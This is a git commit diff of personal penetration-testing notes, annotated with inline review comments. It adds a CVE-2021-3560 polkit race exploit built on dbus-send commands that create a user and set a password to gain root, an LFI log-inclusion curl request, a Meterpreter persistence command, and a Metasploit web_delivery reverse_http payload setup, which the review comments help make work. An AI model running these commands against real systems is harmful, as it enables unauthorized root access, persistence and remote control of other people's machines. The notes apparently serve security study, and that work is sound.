Stefan Friese 2021-09-11 02:55:17 +02:00
parent 9623d1008d
commit 55970b5c82
6 changed files with 65 additions and 7 deletions

exploit/linux/polkit.md Normal file
View File

@ -0,0 +1,24 @@
# CVE-2021-3560
* Exploit `< 0.105-26ubuntu1.1`
## Racing Condition
* Request creation of account via dbus message and `pkexec`. sleep time is variable.
```sh
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:user1 string:"New Account" int32:1 & sleep 0.005s; kill $!
```
* Create password via `openssl passwd -6 -salt salt password123`
```sh
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'$6$salt$cevuzTZ/QBjzuZG0/ebEeedmcTnhyM8ITUu8K032Cp2XvIibq7voqYagm18bwpLBqrg/l/l6YxTmKKibJz5r10' string:'New Password' & sleep 0.005s; kill $!
```
* Request is killed after polkits receives it
* Polkit requests uid of user who sent the message, which has been deleted
* Error will be thrown
* Uid turns to root afterwards
* Request succeeds
* `su user1` and `sudo -s`
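Review bot: the step list under `## Racing Condition` names the wrong thing as deleted: `Polkit requests uid of user who sent the message, which has been deleted` reads as if a user account was removed, but what disappears is the requesting client itself, since `& sleep 0.005s; kill $!` kills `dbus-send` before polkit has resolved the sender's uid; rewording it to something like `polkit asks dbus for the uid of the sender, whose connection is already gone` would make the timing dependency clear. Smaller points in the same hunk: `Racing Condition` should be `Race Condition`, `polkits` should be `polkit`, the `/org/freedesktop/Accounts/User1000` object path in the `SetPassword` call depends on the uid that `CreateUser` assigned and should say so, and the version line would be clearer as `vulnerable: polkit < 0.105-26ubuntu1.1` (an Ubuntu package version) so a reader knows what to check on a host.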

View File

@ -1,6 +1,8 @@
# Local File Inclusion
To test for LFI what we need is a parameter on any URL or other inputs, i.e. request body which includes a file. A parameter in the URL can look like `https://test.com/?file=robots.txt`, the file may be changed.
* [Acunetix article](https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/)
## Usage
* Exploit URL parameter by including other files.
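Review bot: the reference added in this hunk, `[Acunetix article](https://www.acunetix.com/blog/articles/remote-file-inclusion-rfi/)`, is an RFI article placed under a `# Local File Inclusion` heading; either label it as covering RFI or move it to the RFI notes, otherwise readers will take it as the LFI background. In the sentence above it, `i.e. request body` should be `e.g. request body` (one example of an input, not a restatement), and `the file may be changed` would be clearer as `the value of the file parameter is user-controlled`.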
@ -28,3 +30,4 @@ curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host:
```HTTP
curl 'http://<TARGETIP>/lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../'
```
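Review bot: the fence in this hunk is tagged `HTTP` but its content is a `curl` shell command; tag it `sh` like the other snippets in this repo (`polkit.md`, the persistence note) so highlighting and copy-as-shell tooling behave. The hunk header context also shows that this line extends the `/var/log/apache2/access.log` inclusion directly above it, so a short lead-in saying it depends on that preceding step would stop it from reading as a standalone request.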

View File

@ -1,4 +1,11 @@
# Methodology
# Pentesting
Authorized audit of security systems of computers and networks.
* [Rules of Engagement -- Cheat Sheet](https://sansorg.egnyte.com/dl/bF4I3yCcnt/?)
* Permissions
* Scope
* Rules
## Methodology
* Steps
* Reconnaissance
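Review bot: the one-line definition `Authorized audit of security systems of computers and networks.` is awkward; suggest `An authorized security assessment of computer systems and networks.` The `Rules of Engagement -- Cheat Sheet` link is a `sansorg.egnyte.com/dl/...` share link with a dangling `/?`, which can expire; link the SANS page the sheet is published on instead, and indent `Permissions`, `Scope`, `Rules` as sub-items of that entry if that is the intended structure (the rendered diff shows them at the same level as the link).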
@ -8,7 +15,7 @@
* Covering Tracks
* Reporting
## Reconnaissance
### Reconnaissance
* Duck / SearX / metacrawler / google
* Wikipedia
* [Shodan.io](http://www.shodan.io)
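Review bot: demoting `## Reconnaissance` to `### Reconnaissance` is consistent with the new `## Methodology` parent added in the previous hunk, so the change itself is fine; two nits in the context lines: `[Shodan.io](http://www.shodan.io)` should use `https://`, and `Duck / SearX / metacrawler / google` mixes naming styles (presumably `DuckDuckGo`, `SearX`, `MetaCrawler`, `Google`).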
@ -19,7 +26,7 @@
* builtwith.com
* wappalyzer
## Enumeration
### Enumeration
* nmap
* nikto
* gobuster
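Review bot: heading demotion matches the previous hunk; in the surrounding context `builtwith.com` and `wappalyzer` are listed as bare names while the other resources in this section are links, so add links for consistency.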
@ -27,16 +34,24 @@
* metasploit
* enum4linux / linpeas / winpeas / linenum
## Exploitation
### Exploitation
## Privilege Escalation
### Post Exploitation
* Pivoting
#### Privilege Escalation
* Vertically or horizontally
## Covering Tracks
#### Covering Tracks
## Reporting
#### Reporting
* Includes
* Vulnerabilities
* Criticality
* Description
* Countermeasures
* Finding summary
## Frameworks
* [OSSTMM3](https://www.isecom.org/OSSTMM.3.pdf)
* [NIST](https://www.nist.gov/cyberframework)
* [CAF](https://www.ncsc.gov.uk/collection/caf/caf-principles-and-guidance)
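Review bot: the heading levels in this hunk put `#### Covering Tracks` and `#### Reporting` under `### Post Exploitation`, but the `Steps` list in the first hunk (`* Covering Tracks`, `* Reporting`) places them at the same level as Reconnaissance and Enumeration, so they should be `###` like `### Exploitation`; only `#### Privilege Escalation` belongs under Post Exploitation. `### Exploitation` is also left with no body, and the block under Reporting (`* Includes`, `* Vulnerabilities`, `* Criticality`, `* Description`, `* Countermeasures`, `* Finding summary`) renders as a flat list although `Criticality`, `Description` and `Countermeasures` read as attributes of each vulnerability and `Finding summary` as a sibling of `Vulnerabilities`; nest them accordingly.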

View File

@ -0,0 +1,6 @@
# Meterpreter Persistence
## Load shell on system startup
```sh
run persistence -X
```
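Review bot: `run persistence -X` relies on the legacy Meterpreter script, which current Metasploit releases report as deprecated with a pointer to the `exploit/windows/local/persistence` module, so the note should say which version the command is expected to work with. The heading `# Meterpreter Persistence` / `## Load shell on system startup` also gives no indication that this is Windows-specific or what `-X` selects (start at boot); one line on that, and on what the command writes to the target so it can be listed in the report, would make the entry usable beyond copy-paste.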

View File

@ -48,3 +48,13 @@ run post/windows/gather/hashdump
load kiwi
lsa_dump_sam
```
### Webdelivery
```sh
use exploit/multi/script/web_delivery
show targets
set LPORT <attacker-Port>
set PAYLOAD windows/meterpreter/reverse_http
run -j
```
* Copy into powershell/cmd
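Review bot: the `web_delivery` snippet runs `show targets` but never selects one with `set target`, and it sets `LPORT` without `LHOST`, so `run -j` as written will not validate or will fall back to a default target that does not match the `Copy into powershell/cmd` instruction; add `set target <id>` (the PowerShell target from `show targets`) and `set LHOST <attacker-IP>` before `run -j`. The fence is tagged `sh` although these are msfconsole commands, and `* Copy into powershell/cmd` should say that the module prints the one-liner to paste, so the reader knows where it comes from.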

BIN
reverse_shells/docs/prep Normal file

Binary file not shown.